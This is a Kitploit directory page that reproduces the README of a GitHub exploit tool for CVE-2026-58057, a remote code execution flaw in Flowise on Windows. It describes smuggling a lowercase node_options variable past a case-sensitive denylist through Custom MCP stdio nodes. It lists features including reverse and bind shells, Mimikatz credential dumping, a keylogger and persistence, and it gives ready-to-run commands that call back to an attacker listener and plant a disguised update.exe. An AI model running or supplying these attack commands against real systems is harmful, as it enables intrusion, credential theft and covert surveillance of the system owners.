Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Persistence MechanismsVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and Control

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Red Teaming
Payload Development
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

View Repository
1222 months agoNot yet reviewed

About

Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only.

Share

Flowise CVE-2026-58057 - Windows Remote Code Execution Exploit

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 Overview

This is a production-grade exploit for CVE-2026-58057, a critical Remote Code Execution vulnerability in Flowise on Windows platforms. The vulnerability arises from case-sensitive environment variable validation that fails to block lowercase node_options, allowing attackers to bypass the NODE_OPTIONS denylist and execute arbitrary code through Custom MCP stdio configuration.

The exploit demonstrates professional software engineering practices with modular architecture, comprehensive error handling, and support for multiple payload types.

f1

f2

⚠️ Disclaimer

IMPORTANT: This tool is provided for authorized security testing, penetration testing, and educational purposes only.The author is not responsible for any misuse or damage caused by this software.Always obtain proper authorization before testing any system.

🔍 Technical Details

Vulnerability Root Cause

# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Exploit Mechanism

  1. Attacker authenticates to Flowise

  2. Creates/Modifies Custom MCP stdio node

  3. Injects lowercase node_options environment variable

  4. Sets value to --require malicious-loader.js

  5. Node.js executes loader when MCP stdio runs

  6. Arbitrary code execution achieved

✨ Features

Core Capabilities

  • ✅ Reverse Shell - Connect back to attacker machine

  • ✅ Bind Shell - Open listening port on target

  • ✅ Command Execution - Run arbitrary system commands

  • ✅ File Upload - Upload files to target system

  • ✅ Persistence - Multiple persistence mechanisms

  • ✅ Information Gathering - Collect system intelligence

  • ✅ Credential Dumping - Mimikatz integration

  • ✅ Screenshot Capture - Capture desktop screenshots

  • ✅ Keylogger - Install keylogging capability

Technical Features

  • 🔐 Multiple Authentication Methods - API key or username/password

  • 🔄 Auto-Retry Logic - Resilient against network issues

  • 🧹 Self-Cleaning - Removes loader files from target

  • 🌐 Cross-Platform - Works on Windows/Linux/macOS

  • 🎨 Colored Output - Enhanced readability

  • 📊 Verbose Debugging - Detailed logging for troubleshooting

📦 Installation

Prerequisites

  • Python 3.6 or higher

  • pip (Python package manager)

Quick Install

# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Docker Installation (Optional )

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Usage

Command Line Options

python3 exploit.py --help

Authentication Options

OptionDescriptionExample
-t, --targetFlowise URL (Required)http://localhost:3000
-k, --api-keyFlowise API keyflowise_abc123...
-u, --usernameUsernameadmin
-p, --passwordPasswordpassword123

Payload Options

OptionDescriptionExample
--payloadPayload typereverse_shell
--lhostListener host192.168.1.100
--lportListener port4444
--commandCommand to executewhoami
--local-fileFile to uploadpayload.exe
--remote-pathRemote save pathC:\\Temp\\update.exe

Execution Options

OptionDescription
--interactiveStart interactive shell
--verboseEnable debug output
--timeoutRequest timeout in seconds
--retriesNumber of retry attempts

📝 Usage Examples

1. Basic Reverse Shell

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Interactive Reverse Shell

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Command Execution

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. File Upload

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Credential Dumping (Mimikatz )

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Persistence Installation

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Information Gathering

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Screenshot Capture

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 Payload Types

Download Tool